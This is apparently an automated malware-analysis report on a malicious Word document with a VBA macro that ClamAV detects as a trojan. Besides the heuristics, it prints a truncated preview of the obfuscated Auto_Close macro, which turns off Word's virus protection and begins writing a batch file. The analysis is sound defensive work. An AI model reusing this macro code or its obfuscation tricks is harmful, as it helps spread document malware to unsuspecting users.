MALICIOUS
300
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious OLE document containing a VBA macro. The Auto_Close macro is configured to execute a command via the Shell() function. This is a common technique for downloading and executing additional malware. The ClamAV detection further confirms its malicious nature.
Heuristics 6
-
ClamAV: Doc.Trojan.Coke22231-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Coke22231-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 153108 bytes |
SHA-256: afe95e8c6405313b1879f9ad94867bed8624429ba8a91d204c68acc3acf34818 |
|||
|
Detection
ClamAV:
Doc.Trojan.Coke22231-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1TemplateProject.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'vCVforWv Sub AUtOCloSE() On Error Resume Next KGOL = 1 If hKTtYiuXX > BsjBPNee Then bhass = 77 End If Application.DisplayAlerts = wdAlertsNone If TfiPP > srdHOpee Then If EPJnOwXX = AsFvxTT Then If yRJee < tgnGXypll Then If hbGPHII > PiRDyWNtt Then rTceeBFsomTiAA$ = "KmryjDff" oUeHOOFWnHH$ = "AbKEE" End If RscsVV = 12 XGNOQQoeCByBXX$ = "TQaIcc" If FiRmgWluu = dxLlShh Then KCgVJJUBDcLSS$ = "vmbKOO" If RVujuu = RKxwSsAA Then If kYXfBB < JdadJACC Then End If If csKQQ = OgIIIVBpp Then End If If qBMiQiww = dujcFPuu Then End If End If End If End If If IAicc > iuyKXX Then 'iRiXqkktTvkdd End If mTNGGIsArr$ = "sPPOrCC" 'RVHqQNwYYrwvHH End If ouGAWW = 25 End If ssmRRRYFyBCC$ = "GChuu" 'clFfciiwkBvEoo skmYY = 11 Options.ConfirmConversions = False For uOwQovOO = 57 To 2 If FRUHnn > oHkVoII Then If UmObnXX > PECVXuVLL Then UsxcWlGG = 65 If rFjOMxfii = teFfDLTT Then XKkossOHAEXrfBB$ = "WxREMjff" BvBTooeNFLL$ = "vrqjj" PWXneeObMgVwjj$ = "VFkOfuCC" End If End If eFUCbbvYpstjiNN$ = "oEKpXaSS" End If Next uOwQovOO pQymbEEaoHAYxx$ = "XXgDll" If FgKkmUWW < juaoRstff Then heBPYWeecuqCXjCC$ = "PesfKTT" End If ShowVisualBasicEditor = False 'iuNlaykkfWbUpqq sacUQskBB = 72 If KwoVmNVV > EbEGG Then If kvUNN = AWKQoTcc Then If hSUmRoo = rCxGajHH Then If kmmRR = BimmOyy Then Rem iasOOYREpQPP NFbdmyQKK = 13 End If If rdScKK < RvWTeDD Then If FMPMdhll = vbNQIII Then If WDTBmDD = TeRXwYvv Then End If If dehww < JOtOdCuu Then End If If gXxRFfOO > gefqCiuaa Then End If nUEPqTTTkacBggg$ = "EocJICbRR" End If vWaammYitkKDNEE$ = "TUUUtaa" End If aDWtOlgGGSgcSOO$ = "efSYNTGG" End If bxxAA = 26 fDkPRRGCiCJJ$ = "lKNHBpvv" If jxXHH = FXXUdKK Then Rem DcPmWAiioLCXll PqagIpNvvWLqHH$ = "NdARR" End If End If If KysMgg < CKuss Then Rem YQKGCwwAFMynRee EqnXhVIIKiQQll$ = "JNFxx" End If End If RKmQFCnaG = 1 DSMunJAppbGjmhh$ = "TwSjxCxdd" wDMVvWxSS = 86 If iHyBBdJnn < tgaVrjww Then dFWXvAqXX = 32 End If If FbPrr > Vafxbb Then 'wvbEFWjjnLIOEacc 'PrqQLwweEGhDcaTT End If 'cuQhttuhoMM Options.VirusProtection = False ohtLXhh = 88 'sEmYYSPiQQQ Options.SaveNormalPrompt = False SrcqMhCccTNTGG$ = "kPxmm" If lCCrMff = mNxUmxx Then If ndhQcTmm > DekDRR Then If WraSS = GHSitll Then Rem HXVDJJLJILndRll ToeVV = 75 End If WhRAA = 30 DXvUcXX = 88 End If Rem JeYALUWxxVutdnlLvv If ruikk < EXnUaa Then 'vvkpGiieiPurll End If End If Open "C:\HOYF.BAT" For Output As 1 For JEEeAdAMM = 27 To 7 balPcbMKK = 11 If aDQjj < rleQQtww Then If nsOWLHH > HgPIyy Then If WvjOyvlOO = malHOO Then If IFygg > vGDuqAA Then For dXaQfyy = 17 To 2 Next dXaQfyy If BTTNgff < YoUdBUWW Then End If If JeGsqSjj = bLHoo Then End If For vwdMtJJ = 14 To 5 Next vwdMtJJ End If If bodYY = Ifuss Then XVoBTHH = 14 Rem CCJmjwOKKopwxXJXX End If If yxDoSKFoo > NrRoSS Then If LUXNhh = uenrLL Then End If Rem ThBGLBDDmDbnrpuu End If Rem xeXtyosIINUrLL End If vwjgxx = 60 End If ooOhqdhttUwotCSkk$ = "BqWSMKK" End If ebgJwuPPofAfmgww$ = "iJillPKK" Next JEEeAdAMM nqLGCC = 80 nkjII = 88 Print #1, "@ECHO OFf" qTWvUqpPPNjqXQGqnn$ = "YGHTFff" 'fVtqqlKlVeGG eVRmFLgDDgunUoo$ = "KFOVVV" If TnOppp = jQeSMvv Then If QfMreXX > TiTnTT Then If cWmUIgg > WPSLDuu Then If votFCC = CARBckk Then If arCoAA < FgOHrRhh Then If VJNDvv = kbhtt Then End If ISHallFgEqYY$ = "CdUEqNN" If xsjwMJqq = HLehqhss Then End If If qCvDSbOff < yjnWpp Then End If End If If jWjEQQ = NUYYXrHhh Then If EuUxoo < lvjvtiYY Then End If If LVJnjj > VRDkawoo Then End If If NLrTss = lTDett Then End If 'qaAupcqHHOhIdwhoww If gwfyy < kRVTFF Then End If End If aPIbb = 77 CyrbGeOqqYSVWbb$ = "IipSqRR" End If KgYCQQpKVtvv$ = "xaubRbb" If qDtHAA = skHiyLww Then If kgfXREFF < wIQWIXX Then If dbJqCC < QpEIfAoo Then End If If LNLRfrr > eHXGERBB The ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.